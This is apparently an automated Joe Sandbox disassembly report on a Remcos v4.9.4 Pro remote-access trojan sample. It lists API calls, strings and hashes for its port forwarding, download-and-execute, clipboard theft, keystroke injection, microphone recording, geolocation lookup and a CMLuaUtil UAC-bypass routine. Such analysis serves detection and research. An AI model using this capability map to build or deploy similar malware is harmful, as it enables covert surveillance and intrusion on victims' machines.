• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
• API String ID: 3578746661-168337528
• Opcode ID: 5466c89ab892671f0a17b26b268ed42f3236bd5f6bce3b66de4c7b2cab9c5d26
• Instruction ID: a9b6a3d88de1f0e2d1cc034f9e99d9a3d9f27f1fae60aa9f9698ebb2c08aaf03
• Opcode Fuzzy Hash: 5466c89ab892671f0a17b26b268ed42f3236bd5f6bce3b66de4c7b2cab9c5d26
• Instruction Fuzzy Hash: 9851D739F05358DFC708EB38CC65A6E37A9AB80240F50051EE5028B6E0DF74B905CBDA
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 15697F2C: __EH_prolog.LIBCMT ref: 15697F31
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,156E60A4), ref: 15697DDC
• CloseHandle.KERNEL32(00000000), ref: 15697DE5
• DeleteFileA.KERNEL32(00000000), ref: 15697DF4
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 15697DA8
  • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
• String ID: <$@$Temp
• API String ID: 1704390241-1032778388
• Opcode ID: 6406ee1012a2441438d29406b5f949f999c74377da49cf434b2faa7ccc0a1890
• Instruction ID: a0b5d87adb1f95d58881836e37cdf3c958e8ef9a05ee05fbdc1608c501621ab8
• Opcode Fuzzy Hash: 6406ee1012a2441438d29406b5f949f999c74377da49cf434b2faa7ccc0a1890
• Instruction Fuzzy Hash: 9A41BC35E023199BCB18EBA0DC55AFEB779AF10314F400268E506661D0EF743E8ACBD8
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,156F4EE0,156E5FA4,?,00000000,15687FFC,00000000), ref: 156879C5
• WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,15687FFC,00000000,?,?,0000000A,00000000), ref: 15687A0D
  • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
• CloseHandle.KERNEL32(00000000,?,00000000,15687FFC,00000000,?,?,0000000A,00000000), ref: 15687A4D
• MoveFileW.KERNEL32(00000000,00000000), ref: 15687A6A
• CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 15687A95
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 15687AA5
  • Part of subcall function 15684B96: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,156F4EF8,15684C49,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684BA5
  • Part of subcall function 15684B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,1568548B), ref: 15684BC3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
• String ID: .part
• API String ID: 1303771098-3499674018
• Opcode ID: 7ba74bf62633a8c3be7b4f2184a7a3c79dbb657954c2e5e9696704f81219aa2d
• Instruction ID: eb187502a51efcbf834dd6e014c0e43d32766cc949b51cad80a95577d161343c
• Opcode Fuzzy Hash: 7ba74bf62633a8c3be7b4f2184a7a3c79dbb657954c2e5e9696704f81219aa2d
• Instruction Fuzzy Hash: A131AD75609355AFC310DF20C88499BB7ECFF94655F004A1DF98A92180EF75BA48CBDA
Uniqueness

Uniqueness Score: -1.00%

APIs
• AllocConsole.KERNEL32(156F5338), ref: 1569CDA4
• GetConsoleWindow.KERNEL32 ref: 1569CDAA
• ShowWindow.USER32(00000000,00000000), ref: 1569CDBD
• SetConsoleOutputCP.KERNEL32(000004E4), ref: 1569CDE2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Console$Window$AllocOutputShow
• String ID: Remcos v$4.9.4 Pro$CONOUT$
• API String ID: 4067487056-3065609815
• Opcode ID: a69f05ceab8b0400be99538adff98d9c20555762a92d02a728aad1d89e02a62e
• Instruction ID: 79773a9877f4f1b042f6b6f7b89238236a11404ddeb5df79989c4a09ba5f099f
• Opcode Fuzzy Hash: a69f05ceab8b0400be99538adff98d9c20555762a92d02a728aad1d89e02a62e
• Instruction Fuzzy Hash: D20171B5A9330C6AEB10E7F0CC49F8D77ACEB04601F500555BA04A7185EB75B618C7F5
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DE43E7,?,?,02E447C8,?,?,02E0B7A8,02DE6575,02E0A305), ref: 02DE4359
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DE43E7,?,?,02E447C8,?,?,02E0B7A8,02DE6575,02E0A305), ref: 02DE435F
• GetStdHandle.KERNEL32(000000F5,02DE43A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DE43E7,?,?,02E447C8), ref: 02DE4374
• WriteFile.KERNEL32(00000000,000000F5,02DE43A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DE43E7,?,?), ref: 02DE437A
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02DE4398
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: FileHandleWrite$Message
• String ID: Error$Runtime error at 00000000
• API String ID: 1570097196-2970929446
• Opcode ID: 119bfd6706ac9c7e0aabe22058b3af31a18eef0cdf6ce95a40aaf365b0b9a4b8
• Instruction ID: 8cf2512ea16deadff9403c8887a979fed947e09b75d4b1fbfb8ab9bd44a4938a
• Opcode Fuzzy Hash: 119bfd6706ac9c7e0aabe22058b3af31a18eef0cdf6ce95a40aaf365b0b9a4b8
• Instruction Fuzzy Hash: FAF0CD60EC0340B8FE21B2A1BC46F5A278DAB41B15F508B08BB6A942C087B0ACC59736
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,156BEA24,156BEA24,?,?,?,156CAE9A,00000001,00000001,73E85006), ref: 156CACA3
• __alloca_probe_16.LIBCMT ref: 156CACDB
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,156CAE9A,00000001,00000001,73E85006,?,?,?), ref: 156CAD29
• __alloca_probe_16.LIBCMT ref: 156CADC0
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 156CAE23
• __freea.LIBCMT ref: 156CAE30
  • Part of subcall function 156C6137: HeapAlloc.KERNEL32(00000000,156B52BC,?,?,156B8847,?,?,00000000,156F6B50,?,1568DE62,156B52BC,?,?,?,?), ref: 156C6169
• __freea.LIBCMT ref: 156CAE39
• __freea.LIBCMT ref: 156CAE5E
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
• String ID:
• API String ID: 2597970681-0
• Opcode ID: 0c05d9fc054ba7879e6766aa6d21693c3927077e10afd6771da5d0950f674046
• Instruction ID: c2ce68120f148559f8a80a6d9182f41af11ac1dc14deeb7c8984910c72d93ff9
• Opcode Fuzzy Hash: 0c05d9fc054ba7879e6766aa6d21693c3927077e10afd6771da5d0950f674046
• Instruction Fuzzy Hash: F451F072B01216AFDB258F64CC80EAF77AAEB49660F1146A9FD05D7150EBB4EC40D7E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 156999CC
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 156999ED
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 15699A0D
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 15699A21
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 15699A37
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 15699A54
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 15699A6F
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 15699A8B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InputSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3431551938-0
                                                                                                                                                    • Opcode ID: 967b98528e9c629025ab33cb1631151d545383275be0e2cf1cd460d5ea334d80
                                                                                                                                                    • Instruction ID: dd9032a761af103c7f2bad5d01a9403f7d33a1a534900b73c6b2a9f579fb57fe
                                                                                                                                                    • Opcode Fuzzy Hash: 967b98528e9c629025ab33cb1631151d545383275be0e2cf1cd460d5ea334d80
                                                                                                                                                    • Instruction Fuzzy Hash: 6931833195834A6EE301CF51D941FEBBBDCEF89B54F04080EF6809A181D7A295C98B97
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • OpenClipboard.USER32 ref: 15696941
                                                                                                                                                    • EmptyClipboard.USER32 ref: 1569694F
                                                                                                                                                    • CloseClipboard.USER32 ref: 15696955
                                                                                                                                                    • OpenClipboard.USER32 ref: 1569695C
                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 1569696C
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 15696975
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 1569697E
                                                                                                                                                    • CloseClipboard.USER32 ref: 15696984
                                                                                                                                                      • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2172192267-0
                                                                                                                                                    • Opcode ID: 3778d135be671458cb53d2682b815207feed5282ba9ce4e1e4ff6bc5b354b341
                                                                                                                                                    • Instruction ID: 5cdfe755f34742412c4a59897ac4a5170e3c22ea994d5ecaa106efbcab15ec55
                                                                                                                                                    • Opcode Fuzzy Hash: 3778d135be671458cb53d2682b815207feed5282ba9ce4e1e4ff6bc5b354b341
                                                                                                                                                    • Instruction Fuzzy Hash: 37017C353253149FC718AB70CC9CAAE77AABF94A21F81082DEC8782580DF35A804C6E5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,156CBB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 156CB3FE
                                                                                                                                                    • __fassign.LIBCMT ref: 156CB479
                                                                                                                                                    • __fassign.LIBCMT ref: 156CB494
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 156CB4BA
                                                                                                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,156CBB31,00000000,?,?,?,?,?,?,?,?,?,156CBB31,?), ref: 156CB4D9
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,156CBB31,00000000,?,?,?,?,?,?,?,?,?,156CBB31,?), ref: 156CB512
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                    • Opcode ID: 627545771e2fc733f451f0dd9b66635e36f51eb95c345cb621d58ca7b8f8d86d
                                                                                                                                                    • Instruction ID: db728307a7c700cd08d4545e10879c45b4b8058473d568274e7faa8d8736bc7c
                                                                                                                                                    • Opcode Fuzzy Hash: 627545771e2fc733f451f0dd9b66635e36f51eb95c345cb621d58ca7b8f8d86d
                                                                                                                                                    • Instruction Fuzzy Hash: 5151C270E04249AFCB10CFA8C890ADEBBF8FF09310F50459AE955E7291D730A944CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • _strftime.LIBCMT ref: 15681D50
                                                                                                                                                      • Part of subcall function 15681A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 15681AD9
                                                                                                                                                    • waveInUnprepareHeader.WINMM(156F2A88,00000020,00000000,?), ref: 15681E02
                                                                                                                                                    • waveInPrepareHeader.WINMM(156F2A88,00000020), ref: 15681E40
                                                                                                                                                    • waveInAddBuffer.WINMM(156F2A88,00000020), ref: 15681E4F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                    • String ID: %Y-%m-%d %H.%M$.wav
                                                                                                                                                    • API String ID: 3809562944-3597965672
                                                                                                                                                    • Opcode ID: 5f75dc5b4bca2116528a1958ab987e6ad7b6b0d1acbcfe888e81886eb342402f
                                                                                                                                                    • Instruction ID: ff386050c3f359f4a1aff5717794f890ef3f0cdabe24093b9c4db93871ff9487
                                                                                                                                                    • Opcode Fuzzy Hash: 5f75dc5b4bca2116528a1958ab987e6ad7b6b0d1acbcfe888e81886eb342402f
                                                                                                                                                    • Instruction Fuzzy Hash: 62316275A19315DFC324DB24CCA4AAE77E9BB54210F40491EE14993290EF30B919CFEA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156935A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 156935CA
                                                                                                                                                      • Part of subcall function 156935A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 156935E7
                                                                                                                                                      • Part of subcall function 156935A6: RegCloseKey.ADVAPI32(?), ref: 156935F2
                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 1568BF6B
                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 1568BF78
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                    • API String ID: 1133728706-4073444585
                                                                                                                                                    • Opcode ID: 81469cd28ea4e1a68f1d360d4a10b7200002624d4f61051f0d061ef8da181d4f
                                                                                                                                                    • Instruction ID: c5bb8c20b354ebbe0f1cc5cc1860158a0ef34b8f367f03d6d58eaad24b6e3913
                                                                                                                                                    • Opcode Fuzzy Hash: 81469cd28ea4e1a68f1d360d4a10b7200002624d4f61051f0d061ef8da181d4f
                                                                                                                                                    • Instruction Fuzzy Hash: 0B21A135B03219AACB04E7F0DCA5CFE7778AF54200F800159E902A7294EF20BE59CBE5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 1569B3A7
                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 1569B3BD
                                                                                                                                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 1569B3D6
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 1569B41C
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 1569B41F
                                                                                                                                                    Strings
                                                                                                                                                    • http://geoplugin.net/json.gp, xrefs: 1569B3B7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                    • String ID: http://geoplugin.net/json.gp
                                                                                                                                                    • API String ID: 3121278467-91888290
                                                                                                                                                    • Opcode ID: 11906e7e438ad0094e71231761643bd88d9f4dd8367be9be170b47c14e950ce2
                                                                                                                                                    • Instruction ID: dd77c27f25e408d406c9a2e683a19fafab5d09d87df2631b761efa39cb398cac
                                                                                                                                                    • Opcode Fuzzy Hash: 11906e7e438ad0094e71231761643bd88d9f4dd8367be9be170b47c14e950ce2
                                                                                                                                                    • Instruction Fuzzy Hash: 8111C8356063256BD324DA258C88DBB7F9DEF45560F40052DF84592151DF64A804C7F5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

APIs
  • Part of subcall function 156D0C41: _free.LIBCMT ref: 156D0C6A
• _free.LIBCMT ref: 156D0F48
  • Part of subcall function 156C6782: HeapFree.KERNEL32(00000000,00000000,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?), ref: 156C6798
  • Part of subcall function 156C6782: GetLastError.KERNEL32(?,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?,?), ref: 156C67AA
• _free.LIBCMT ref: 156D0F53
• _free.LIBCMT ref: 156D0F5E
• _free.LIBCMT ref: 156D0FB2
• _free.LIBCMT ref: 156D0FBD
• _free.LIBCMT ref: 156D0FC8
• _free.LIBCMT ref: 156D0FD3
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
• Instruction ID: 08e669040eb848c659cb6e7b3c7086cf1eed2f71e32486907e539307e48b291e
• Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
• Instruction Fuzzy Hash: 53116035646708BAD520AB74CC45FCBB7DCEF08750F404C15AAEE67061E6B4F904D6D8
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,156BA351,156B92BE), ref: 156BA368
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 156BA376
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 156BA38F
• SetLastError.KERNEL32(00000000,?,156BA351,156B92BE), ref: 156BA3E1
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: d5d7e4d4bf98e930012ef0ce237883aeab9bf5f5ffeaf96d3eada58a08b9c29c
• Instruction ID: 27776e3ddc46cbdeb5fc5d4e21feb918de867a5cb0b48b3a0a8fb78710b6590e
• Opcode Fuzzy Hash: d5d7e4d4bf98e930012ef0ce237883aeab9bf5f5ffeaf96d3eada58a08b9c29c
• Instruction Fuzzy Hash: A501B536B2D3669ED30515789CF5A5E264DEB426F6720032EE414919D4EFE26801D3D8
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\fu56fbrtn8.exe), ref: 156875D0
  • Part of subcall function 156874FD: _wcslen.LIBCMT ref: 15687521
  • Part of subcall function 156874FD: CoGetObject.OLE32(?,00000024,156E6518,00000000), ref: 15687582
• CoUninitialize.OLE32 ref: 15687629
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: InitializeObjectUninitialize_wcslen
• String ID: C:\Users\user\Desktop\fu56fbrtn8.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• API String ID: 3851391207-3484095926
• Opcode ID: 3089ef8c8455ce5cbfb0f1c285d5fb5e3e40d3de5165177b8e12f22c0a2dba7d
• Instruction ID: 927ad4bbff3ac22643f047b9a56422ffd3d61763ffa99d9b01c3891f97ad02d5
• Opcode Fuzzy Hash: 3089ef8c8455ce5cbfb0f1c285d5fb5e3e40d3de5165177b8e12f22c0a2dba7d
• Instruction Fuzzy Hash: BB01DE323063116BE3248A24EC5DFAB374CEF44629F11061EF94186181EB5AAC80C6F0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02DEACF8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DEAD15
  • Part of subcall function 02DEACF8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DEAD39
  • Part of subcall function 02DEACF8: GetModuleFileNameA.KERNEL32(02DE0000,?,00000105), ref: 02DEAD54
  • Part of subcall function 02DEACF8: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DEADEA
• CharToOemA.USER32(?,?), ref: 02DEAEB7
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02DEAED4
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DEAEDA
• GetStdHandle.KERNEL32(000000F4,02DEAF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DEAEEF
• WriteFile.KERNEL32(00000000,000000F4,02DEAF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DEAEF5
• LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02DEAF17
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 02DEAF2D
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
• String ID:
• API String ID: 185507032-0
• Opcode ID: 793a5ccb39574c72d6c3509b779391c2a61b4e53d434534b837f845699dd3b28
• Instruction ID: de5e3b23d34b5db56a54b047ccd9345c2587d3abfa96fc49547d9ba320dcc1c9
• Opcode Fuzzy Hash: 793a5ccb39574c72d6c3509b779391c2a61b4e53d434534b837f845699dd3b28
• Instruction Fuzzy Hash: CE11CEB6194201AADE00FBA4DC81F8E73EDEB14700F800929B756D62E0DA70ED848F76
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 1569ADF2
• PlaySoundW.WINMM(00000000,00000000), ref: 1569AE00
• Sleep.KERNEL32(00002710), ref: 1569AE07
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 1569AE10
Strings
Memory Dump Source
